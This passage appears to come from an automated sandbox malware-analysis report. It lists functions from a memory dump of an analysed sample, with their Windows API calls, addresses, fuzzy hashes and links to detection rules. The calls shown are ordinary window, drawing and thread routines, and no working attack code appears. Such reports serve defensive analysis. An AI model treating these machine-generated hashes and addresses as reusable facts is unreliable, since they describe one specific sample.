                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: MessageSend
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 3850602802-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: eb4dedc5c369399155af048563f3e7a0653b3d3555337444b06e73bd6e387956
                                                                                                                                                                                                                                                                                                        • Instruction ID: dc03441b71ef493a43572fd39ff2f53208f3a3cfdb40d163be1641c0d2186aa2
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: eb4dedc5c369399155af048563f3e7a0653b3d3555337444b06e73bd6e387956
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0511393A900218FFEB11DBA8CD85F9DFBB8FB08750F214091EA00B7294D6716E10DB94
                                                                                                                                                                                                                                                                                                        Function 00FB1AAC Relevance: 6.1, APIs: 4, Instructions: 56COMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00FB249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00FB24B0
                                                                                                                                                                                                                                                                                                        • DefDlgProcW.USER32(?,00000020,?,00000000), ref: 00FB1AF4
                                                                                                                                                                                                                                                                                                        • GetClientRect.USER32(?,?), ref: 00FF31F9
                                                                                                                                                                                                                                                                                                        • GetCursorPos.USER32(?), ref: 00FF3203
                                                                                                                                                                                                                                                                                                        • ScreenToClient.USER32(?,?), ref: 00FF320E
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: Client$CursorLongProcRectScreenWindow
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 4127811313-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: 9a015342387c44d0b07a6abeb2bc53f1f75a88d034ae2cf96ecd2aa3f8b4aa21
                                                                                                                                                                                                                                                                                                        • Instruction ID: ac56b54b633643ae08a2fa7f82b9d7b4382a151b49fa743bc61cd74b3d338bca
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9a015342387c44d0b07a6abeb2bc53f1f75a88d034ae2cf96ecd2aa3f8b4aa21
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B8114876A0101AEBCB10EFA8C9859FF77B8FF05354F500452EA42E3140C739BA91EBA1
                                                                                                                                                                                                                                                                                                        Function 0101EAED Relevance: 6.1, APIs: 4, Instructions: 55synchronizationthreadwindowCOMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 0101EB14
                                                                                                                                                                                                                                                                                                        • MessageBoxW.USER32(?,?,?,?), ref: 0101EB47
                                                                                                                                                                                                                                                                                                        • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 0101EB5D
                                                                                                                                                                                                                                                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 0101EB64
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 2880819207-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: beebe1c3a35b55972e91d29c8faa730b0913c7b729c6d7bee4f33b9b7d2bf35a
                                                                                                                                                                                                                                                                                                        • Instruction ID: d8e77cc52e48b222730cf785d6ec024a1f303eb016549208d240c06cef0fe934
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: beebe1c3a35b55972e91d29c8faa730b0913c7b729c6d7bee4f33b9b7d2bf35a
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 92112BB6904218BBD7229BACDC45A9F7FADBB46310F04825AFC95D3285D6B9C9048770
                                                                                                                                                                                                                                                                                                        Function 00FDD53C Relevance: 6.1, APIs: 4, Instructions: 55threadCOMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • CreateThread.KERNEL32(00000000,?,00FDD369,00000000,00000004,00000000), ref: 00FDD588
                                                                                                                                                                                                                                                                                                        • GetLastError.KERNEL32 ref: 00FDD594
                                                                                                                                                                                                                                                                                                        • __dosmaperr.LIBCMT ref: 00FDD59B
                                                                                                                                                                                                                                                                                                        • ResumeThread.KERNEL32(00000000), ref: 00FDD5B9
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: Thread$CreateErrorLastResume__dosmaperr
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 173952441-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: c64d294df60c14f4f1de4cb6c1327398e3f2e8e2cc17fae62abf1f109883fef0
                                                                                                                                                                                                                                                                                                        • Instruction ID: 809e04385e20f2bb0ab4990e85431571a45b57ff2f7ec1a30512d4ba40310d9a
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c64d294df60c14f4f1de4cb6c1327398e3f2e8e2cc17fae62abf1f109883fef0
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: FE014576800214BBCB206FA5EC05FAA3B2EEF81335F1C021BF825823D0CB758800E3A0
                                                                                                                                                                                                                                                                                                        Function 00FB7873 Relevance: 6.1, APIs: 4, Instructions: 53windowCOMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00FB78B1
                                                                                                                                                                                                                                                                                                        • GetStockObject.GDI32(00000011), ref: 00FB78C5
                                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(00000000,00000030,00000000), ref: 00FB78CF
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: CreateMessageObjectSendStockWindow
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 3970641297-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: 8defa49214c002c82600e93646e62643862d2d71756d46c95e99ae2eb4cb022e
                                                                                                                                                                                                                                                                                                        • Instruction ID: 04b5d76bbd4528e776a89bc00dc8220fa264d78fce5700a333e5a72477f26d05
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8defa49214c002c82600e93646e62643862d2d71756d46c95e99ae2eb4cb022e
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 39118BB2905248BFEF12AF918C98EEABB69FF583A4F140115FA4052110D736DC60FBA0
                                                                                                                                                                                                                                                                                                        Function 00FE33E6 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000364,00000000,00000000,?,00FE338D,00000364,00000000,00000000,00000000,?,00FE35FE,00000006,FlsSetValue), ref: 00FE3418
                                                                                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,00FE338D,00000364,00000000,00000000,00000000,?,00FE35FE,00000006,FlsSetValue,01053260,FlsSetValue,00000000,00000364,?,00FE31B9), ref: 00FE3424
                                                                                                                                                                                                                                                                                                        • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00FE338D,00000364,00000000,00000000,00000000,?,00FE35FE,00000006,FlsSetValue,01053260,FlsSetValue,00000000), ref: 00FE3432
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: LibraryLoad$ErrorLast
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 3177248105-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: 22d571a2a8f9d9257be7f40cf924bed9b15c82f8dac4d5b8913290a9bcc03725
                                                                                                                                                                                                                                                                                                        • Instruction ID: ed2094bf932203a2c1377b12342e2f6b480eb8aa306bd9f5ad7a3eb7f32a5360
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 22d571a2a8f9d9257be7f40cf924bed9b15c82f8dac4d5b8913290a9bcc03725
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3601D476B11262ABCB32CABA9D4CA563B98AF64B717210220F946D31C1C736DE01D7E0
                                                                                                                                                                                                                                                                                                        Function 0101BA6F Relevance: 6.0, APIs: 4, Instructions: 50sleepCOMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,0101B69A,?,00008000), ref: 0101BA8B
                                                                                                                                                                                                                                                                                                        • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,0101B69A,?,00008000), ref: 0101BAB0
                                                                                                                                                                                                                                                                                                        • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,0101B69A,?,00008000), ref: 0101BABA
                                                                                                                                                                                                                                                                                                        • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,0101B69A,?,00008000), ref: 0101BAED
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: CounterPerformanceQuerySleep
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 2875609808-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: 97964b6c905d588fb4e8bdc60c7740e5a0a67a4a42925664e184260cb8371be5
                                                                                                                                                                                                                                                                                                        • Instruction ID: 4b4f1d9b68562966e34b138fc5060e6a91bb6c36111a580cbe6d6fda7baf3eaf
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 97964b6c905d588fb4e8bdc60c7740e5a0a67a4a42925664e184260cb8371be5
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C1115E72C00519E7CF10DFE9E9897EEBB78BF09712F404099D9C172148CB399650CBA5
                                                                                                                                                                                                                                                                                                        Function 0104886F Relevance: 6.0, APIs: 4, Instructions: 46COMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • GetWindowRect.USER32(?,?), ref: 0104888E
                                                                                                                                                                                                                                                                                                        • ScreenToClient.USER32(?,?), ref: 010488A6
                                                                                                                                                                                                                                                                                                        • ScreenToClient.USER32(?,?), ref: 010488CA
                                                                                                                                                                                                                                                                                                        • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 010488E5
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: ClientRectScreen$InvalidateWindow
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 357397906-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: a2c6e8ec4842ee40fa476934589bf7dcf7ac7a7c347da4eb089904fdb1ef5ccf
                                                                                                                                                                                                                                                                                                        • Instruction ID: 092e3b9b20d1da0bd0ebbe29b35d600ebf4d9f35a0eaaa7450fff886d91d620e
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a2c6e8ec4842ee40fa476934589bf7dcf7ac7a7c347da4eb089904fdb1ef5ccf
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7B1142B9D00209EFDB51CFE8D584AEEBBF5FB08214F108166E955E3214D735AA54CF50
                                                                                                                                                                                                                                                                                                        Function 010136F4 Relevance: 6.0, APIs: 4, Instructions: 34threadwindowtimeCOMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 01013712
                                                                                                                                                                                                                                                                                                        • GetWindowThreadProcessId.USER32(?,00000000), ref: 01013723
                                                                                                                                                                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 0101372A
                                                                                                                                                                                                                                                                                                        • AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 01013731
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 2710830443-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: f8aece6056c866385630be6faa2fd9195f35c55c5167d6a36b9e34f725495d77
                                                                                                                                                                                                                                                                                                        • Instruction ID: b853b5a7f7765108659ceefd4fc7240fc2d6a9cfc09a8c6e50f5eac90a624624
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f8aece6056c866385630be6faa2fd9195f35c55c5167d6a36b9e34f725495d77
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 19E06DB52012247BDA3056A6AD8DEEB7F6CFB56BB1F000015F649D6084DAA9C440D3B0
                                                                                                                                                                                                                                                                                                        Function 010492BF Relevance: 6.0, APIs: 4, Instructions: 31COMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00FB1F2D: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00FB1F87
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00FB1F2D: SelectObject.GDI32(?,00000000), ref: 00FB1F96
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00FB1F2D: BeginPath.GDI32(?), ref: 00FB1FAD
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00FB1F2D: SelectObject.GDI32(?,00000000), ref: 00FB1FD6
                                                                                                                                                                                                                                                                                                        • MoveToEx.GDI32(?,00000000,00000000,00000000), ref: 010492E3
                                                                                                                                                                                                                                                                                                        • LineTo.GDI32(?,?,?), ref: 010492F0
                                                                                                                                                                                                                                                                                                        • EndPath.GDI32(?), ref: 01049300
                                                                                                                                                                                                                                                                                                        • StrokePath.GDI32(?), ref: 0104930E
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 1539411459-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: b5f390c17f5130a2fa72eb18b16495012ea080f573aed14076174861828446c9
                                                                                                                                                                                                                                                                                                        • Instruction ID: 25295c7b4114ef899e0cb61064b6a493b1e7dda5cb922ef241e2d9b604b0edd2
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b5f390c17f5130a2fa72eb18b16495012ea080f573aed14076174861828446c9
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9AF0BE71005258BBDB222F94AD0EFCE3F59AF1A361F008100FA91220D5C37A5161DFE5
                                                                                                                                                                                                                                                                                                        Function 00FB21A0 Relevance: 6.0, APIs: 4, Instructions: 23COMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • GetSysColor.USER32(00000008), ref: 00FB21BC
                                                                                                                                                                                                                                                                                                        • SetTextColor.GDI32(?,?), ref: 00FB21C6
                                                                                                                                                                                                                                                                                                        • SetBkMode.GDI32(?,00000001), ref: 00FB21D9
                                                                                                                                                                                                                                                                                                        • GetStockObject.GDI32(00000005), ref: 00FB21E1
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: Color$ModeObjectStockText
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 4037423528-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: 48fc57875d50b97d778b72186d20c0e40f6dae82013bde58f71eaa538a3e0da8
                                                                                                                                                                                                                                                                                                        • Instruction ID: b66910069250877e1448314ef9604189c726473f4c5566ab89b5900dad0a538e
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 48fc57875d50b97d778b72186d20c0e40f6dae82013bde58f71eaa538a3e0da8
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: CEE06575640244BBDB315BB4A849BEC3B21AB25335F048219FBF5540E4C7768640AB10
                                                                                                                                                                                                                                                                                                        Function 0100EC36 Relevance: 6.0, APIs: 4, Instructions: 19COMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • GetDesktopWindow.USER32 ref: 0100EC36
                                                                                                                                                                                                                                                                                                        • GetDC.USER32(00000000), ref: 0100EC40
                                                                                                                                                                                                                                                                                                        • GetDeviceCaps.GDI32(00000000,0000000C), ref: 0100EC60
                                                                                                                                                                                                                                                                                                        • ReleaseDC.USER32(?), ref: 0100EC81
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
